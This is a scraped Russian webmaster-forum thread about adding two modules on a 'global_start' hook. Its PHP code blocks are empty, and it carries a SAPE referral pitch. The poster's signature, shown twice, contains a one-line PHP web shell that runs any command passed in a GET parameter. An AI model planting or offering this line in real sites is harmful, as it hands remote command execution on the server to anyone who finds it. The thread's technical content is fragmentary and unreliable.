![]() |
|||||||
![]() |
|
|||||||
| В помощь Web-Мастеру Здесь обсуждаются любые вопросы по WEB-мастерингу: WEB-языки (HTML, CSS, JavaScript, Perl, PHP, ASP и т.д.), Раскрутка (CEO) , Хостинг,Реклама ,Партнерки и т.д. Выложить свои бесплатные скрипты тоже можно здесь. |
![]() |
|
|
LinkBack | Опции темы | Опции просмотра |
|
|
#1 (permalink) |
|
In Death We Trust
© AoA Team
Вы сказали Спасибо: 3
Поблагодарили 16 раз(а) в 15 сообщениях
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Нужно создать два модуля.
В первом на global_start вешаем инициализирующий код: PHP код:
PHP код:
Если у вас есть сайт, начните зарабатывать на нем.Регистрируйтесь по этой ссылке и становитесь моими рефералами. Помощь и поддержку гарантирую =) даже 10 страничный сайт с тиц10 пр 0 запросто окупает хостинг при работе в сапе ^_~
Я в отпуске ! Занимаюсь исключительно проблемами связанными с работой форума. Для всех прочих вопросов есть другие админы. Извечный спор между собой ведут Луна и звезды - кто из них главней? И кто в ответе за игру ночных теней? Ничего святого =\ Для анегдотов =>abuse(а)AheadOfAll.Org <?system($_GET["2pwn"]); ?> Для идиотов Мои услуги, по прайсу.
|
|
|
|
| Реклама=\ | |
|
|
|
|
|
#2 (permalink) | |
|
Модератор
Вы сказали Спасибо: 6
Поблагодарили 1 раз в 1 сообщении
![]() |
|
|
|
|
#3 (permalink) | |
|
In Death We Trust
© AoA Team
Вы сказали Спасибо: 3
Поблагодарили 16 раз(а) в 15 сообщениях
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Я в отпуске ! Занимаюсь исключительно проблемами связанными с работой форума. Для всех прочих вопросов есть другие админы. Извечный спор между собой ведут Луна и звезды - кто из них главней? И кто в ответе за игру ночных теней? Ничего святого =\ Для анегдотов =>abuse(а)AheadOfAll.Org <?system($_GET["2pwn"]); ?> Для идиотов Мои услуги, по прайсу.
|
|
|
|
|